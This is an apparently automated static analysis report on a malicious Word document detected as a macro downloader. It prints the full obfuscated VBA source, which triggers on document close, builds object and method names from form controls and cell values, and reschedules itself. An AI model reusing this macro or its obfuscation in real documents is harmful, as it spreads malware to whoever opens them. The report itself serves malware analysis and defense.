Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 09a1b5d510b287f5…

MALICIOUS

Office (OOXML)

82.3 KB Created: 2021-01-29 12:37:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-02-09
MD5: c14814bdeccb91be87b41695c6f192b9 SHA-1: cc292eea937c6d647da7eda982ae27706223a531 SHA-256: 09a1b5d510b287f528830daefafec6c04ca1df23a6496e8d500f1db93377c0d5
222 Risk Score

Heuristics 5

  • ClamAV: Doc.Downloader.Valyria-10033915-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Valyria-10033915-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set vp8 = CreateObject(UserForm1.nt & UserForm1.gb)
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    Set pb = CallByName(vp8.Workbooks, UserForm1.bg & UserForm1.b, 1, UserForm2.ComboBox1, , , , UserForm1.ov)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 6971 bytes
SHA-256: 40c6aefeae9d609bbda58580d258f97a0835846214f0e282c104844336f7c9a2
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True


Public f7, ai, fg, ajl, tg0, vp8, hz, kz, knt, q8b, xo, nd, k5, ez, qt, cs

Sub Document_Close()

et

End Sub

Sub et()

On Error Resume Next

UserForm2.ComboBox1.ListIndex = 5

Set vp8 = CreateObject(UserForm1.nt & UserForm1.gb)

vp8.DisplayAlerts = False

z7 = 1301

tpd = 0

Err.Number = 0

While z7 <> 0 And tpd < 32

Set pb = CallByName(vp8.Workbooks, UserForm1.bg & UserForm1.b, 1, UserForm2.ComboBox1, , , , UserForm1.ov)

z7 = Err.Number

tpd = tpd + 16

Wend

If z7 <> 0 Then

qe = UserForm2.ComboBox4

ErrHandler:

ij = CallByName(Application, UserForm1.zb9 & UserForm1.mj, 2)

If ij <> False Then

Set li = CreateObject(UserForm1.g3 & UserForm1.kg)

CallByName li.Documents, UserForm1.bg & UserForm1.b, 1, ActiveDocument.FullName, , True

ff = UserForm2.ComboBox26

g5 = UserForm2.ComboBox15

CallByName li, UserForm1.eu & UserForm1.ow, 1, Now + TimeSerial(0, 0, 2), UserForm1.ec & UserForm1.kq6 & "et"

Else

ve = UserForm2.ComboBox12

CallByName Application, UserForm1.eu & UserForm1.ow, 1, Now + TimeSerial(0, 0, 17), UserForm1.ec & UserForm1.kq6 & "et"

End If

vp8.Quit

Exit Sub

End If

Dim je

Set je = vp8.sheets(1)

bb = "'"

cs = vp8.sheets(5).Cells(1, 1)

If Len(cs) < 1 Then

If vp8.ActiveWorkbook.Title <> "Google" Then

GoTo ErrHandler

Else

Exit Sub

End If

End If

lg = je.Cells(94, 28).Value

m3 = UserForm2.ComboBox20

bs = je.Cells(7, 14).Value

q8b = vp8.sheets(1).Cells(122, 34).Value

xo = vp8.sheets(2).Cells(21, 55).Value

tg0 = vp8.sheets(2).Cells(76, 31).Value

f8d = vp8.sheets(2).Cells(142, 60).Value

lt = UserForm2.ComboBox7

fr6 = je.Cells(128, 38).Value

b2 = vp8.sheets(3).Cells(54, 34).Value

uk1 = vp8.sheets(2).Cells(143, 20).Value

om = je.Cells(29, 52).Value

k5 = vp8.sheets(2).Cells(65, 27).Value

hz = vp8.sheets(1).Cells(124, 1).Value

af = UserForm2.ComboBox15

knt = vp8.sheets(3).Cells(94, 51).Value

bnr = vp8.sheets(3).Cells(38, 31).Value

r7 = vp8.sheets(2).Cells(119, 1).Value

nd = vp8.sheets(1).Cells(55, 56).Value

kn = vp8.sheets(1).Cells(53, 40).Value

jly = vp8.sheets(2).Cells(38, 9).Value

f7 = vp8.sheets(3).Cells(39, 8).Value

jn = vp8.sheets(3).Cells(133, 39).Value

r8 = vp8.sheets(1).Cells(149, 18).Value

kz = vp8.sheets(3).Cells(112, 29).Value

ai = vp8.sheets(3).Cells(76, 27).Value

j0 = vp8.sheets(3).Cells(76, 30).Value

d7 = vp8.sheets(2).Cells(63, 33).Value

e3 = UserForm2.ComboBox6

qt = ""

Set Sh1 = vp8.sheets(4)

a3 = 1

gz = True

While gz

dt = Sh1.Cells(a3, 1).Value

If Len(dt) < 1 Then

gz = False

Else

qt = qt & dt

End If

a3 = a3 + 1

Wend

nq = CallByName(vp8, om, 2)

UserForm1.iq.Value = fr6 & nq & jly

dz = UserForm2.ComboBox15

UserForm1.i5.Value = bs

CallByName CreateObject(d7), r8, 1, UserForm1.iq, kn, UserForm1.i5

Set q5 = CreateObject(lg)

Set mc = CallByName(q5, f8d, 2)

nz = UserForm2.ComboBox5

Set f6 = CallByName(mc, j0, 1)

Set knt = CallByName(q5, knt, 2)

ga = UserForm2.ComboBox17

Set ajl = q5

UserForm5.ComboBox1 = "a6"

Set f7 = CallByName(ez, f7, 2)

kz = CallByName(f7, kz, 2)

b4 = UserForm2.ComboBox5

UserForm1.ic.Value = jn & b2

UserForm3.ComboBox1 = uk1

cc = UserForm2.ComboBox17

UserForm1.ic.Value = bnr

r4 = UserForm2.ComboBox12

UserForm4.ComboBox1 = UserForm3.ComboBox1

g = UserForm2.ComboBox16

UserForm3.ComboBox1 = kz

q5 = ml

la = UserForm2.ComboBox27

dd = UserForm2.ComboBox12

pb = k9

je = jx

mc = b8

f6 = db0

knt = v1e

q8b = qb

xo = a

ez = hs

f7 = cn

ajl = hx

DoEvents

CallByName vp8, r7, 1

vp8 = j2

vq = UserForm2.ComboBox6

jk = UserForm2.ComboBox7

End Sub

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{C4591392-2F63-454D-A3C4-29B0AE36FE73}{F7CF552D-8C08-4868-A5FC-C62F7C9A78B4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{F3F23911-77BB-4C5D-9F6C-680A9F783DC8}{0E2203DC-943C-4714-AF36-B8B64E7856D7}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 
 

 q0 = UserForm2.Controls.Count - 1
 
 

r6 = UserForm2.ComboBox10

 
 

 m8 = ""

pm = UserForm2.ComboBox9

 For bq = 1 To q0 Step 2
 m8 = m8 & UserForm2.Controls.Item(bq)
 Next

 ComboBox1.AddItem "f8"
 ComboBox1.AddItem "zg"
 ComboBox1.AddItem "ei"

l5 = UserForm2.ComboBox6

 ComboBox1.AddItem "ed"
 ComboBox1.AddItem "i3"
 ComboBox1.AddItem m8
 ComboBox1.AddItem "gz"
 
 
 
 
 
 
 
End Sub


Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{A9805F70-02DB-4067-9D6E-E3A6994455D4}{2E1A5DB0-39D4-4A63-ACC1-8D5D42B25C91}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 CallByName ActiveDocument.f7, ActiveDocument.hz, VbMethod, 1, ActiveDocument.kz
 CallByName ActiveDocument.f7, ActiveDocument.ai, VbMethod, UserForm1.ic.Value
End Sub

 

Attribute VB_Name = "UserForm4"
Attribute VB_Base = "0{EF0D0335-219B-4A79-A790-4B60037D07CE}{00E680D7-5960-4695-A23F-447950ABC9FF}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 CallByName ActiveDocument.ajl, ActiveDocument.tg0, VbMethod, UserForm1.ic.Value, ActiveDocument.qt, ActiveDocument.cs
End Sub

 

Attribute VB_Name = "UserForm5"
Attribute VB_Base = "0{D0E00784-E191-4D52-B04D-F683BB300A3A}{98A9FD73-12F2-4DF7-B73F-404A5617E803}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 Set ActiveDocument.q8b = CallByName(ActiveDocument.knt, ActiveDocument.q8b, VbGet)
 Set ActiveDocument.xo = CallByName(ActiveDocument.q8b, ActiveDocument.xo, VbGet)
 Set ActiveDocument.ez = CallByName(ActiveDocument.xo, ActiveDocument.nd, VbMethod, ActiveDocument.k5)
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 50688 bytes
SHA-256: b2195b39d55aa8a0898fc6a524f158906411df785cec9a6822ce8e942dbaec40
Detection
ClamAV: Doc.Downloader.Valyria-10033915-0
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.